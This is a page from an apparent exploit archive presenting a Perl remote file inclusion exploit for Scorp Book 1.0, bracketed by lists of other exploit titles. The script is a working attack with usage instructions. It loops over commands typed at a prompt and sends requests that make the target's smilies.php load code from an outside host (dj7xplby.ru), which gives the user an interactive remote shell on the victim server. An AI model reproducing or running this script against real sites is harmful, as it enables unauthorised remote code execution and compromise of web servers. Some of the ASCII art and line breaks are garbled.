exploits , vulnerabilities , articles , Scorp Book 1.0 (smilies.php config) Remote File Inclusion Vulnerability

2007-06-07 Madirish Webmail 2.0 (addressbook.php) Remote File Inclusion Vuln
2007-05-22 Ol Bookmarks Manager 0.7.4 Remote SQL Injection Vulnerability
2007-05-22 Ol Bookmarks Manager 0.7.4 (root) Remote File Inclusion Vulnerabilities
2007-04-15 LS simple guestbook (v1) Remote Code Execution Vulnerability
2007-04-12 RicarGBooK 1.2.1 (header.php lang) Local File Inclusion Vulnerability
2007-04-10 Crea-Book <= 1.0 Admin Access Bypass / DB Disclosure / Code Execution

2007-04-08

Scorp Book 1.0 (smilies.php config) Remote File Inclusion Vulnerability

Rated as : High Risk

#!/usr/bin/perl
#                                                        
.-""""""""-.                       
         
#                                                        /   Dj7xpl   \   
                          
#                                                       |              |  
                             
#                                                       |,  .-.  .-.  ,|  
                             
#                                                       | )(_o/  \o_)( |  
                                  
#                                                       |/     /\     \|  
                              
#                                             (@_       (_     ^^     _)  
               
#                                        _     )
\_______\__|IIIIII|__/_______________________________
#                                      
(_)@8@8{}<________|-\IIIIII/-|________________________________>
#                                              )_/        \          / 
#                                              (@
#											   
#_______________________________________________Iranian Are The Best In
World___________________________________________#
#
#
#       [~] Portal.......:  Scorp Book v1.0
#	[~] Download.....:  http://www.ectona.org/download/?id=598&s=info
#	[~] Author.......:  Dj7xpl  | Dj7xpl@yahoo.com
#       [~] Class........:  Remote File Include Exploit
#
#_______________________________________________________________________________________________________________________#
#########################################################################################################################

use IO::Socket;
if (@ARGV < 2){
print "

    
+**********************************************************************+
     *                                                                    
 *
     *   # Scorp Book <== v1.0 (smilies.php) Remote File Include
Exploit    *
     *                                                                    
 *
     *   # Usage   :  xpl.pl [Target] [Path]                              
 *
     *                                                                    
 *
     *   # Example :  xpl.pl Dj7xpl.ir /gb                                
 *
     *                                                                    
 *
     *                       Vuln & Coded By Dj7xpl                       
 *
    
+**********************************************************************+

";
exit();
}

$host=$ARGV[0];
$path=$ARGV[1];

print "\n[~] Please wait ...\n";

print "[~] Shell : ";$cmd = <STDIN>;

while($cmd !~ "END") {
    $socket = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>"$host", PeerPort=>"80") or die
"Connect Failed.\n\n";
    print $socket "GET
".$path."/smilies.php?config=http://dj7xplby.ru/cmd?cmd=$cmd
HTTP/1.1\r\n";
    print $socket "Host: ".$host."\r\n";
    print $socket "Accept: */*\r\n";
    print $socket "Connection: close\r\n\n";

    while ($raspuns = <$socket>)
    {
        print $raspuns;
    }

    print "[~] Shell : ";
    $cmd = <STDIN>;
	}
securitydot.net - 2007-04-08

Exploits - newest 10 RSS | More

2007-06-15 57299 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34221 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42446 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29342 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19780 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16714 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19416 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16599 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33615 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17240 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit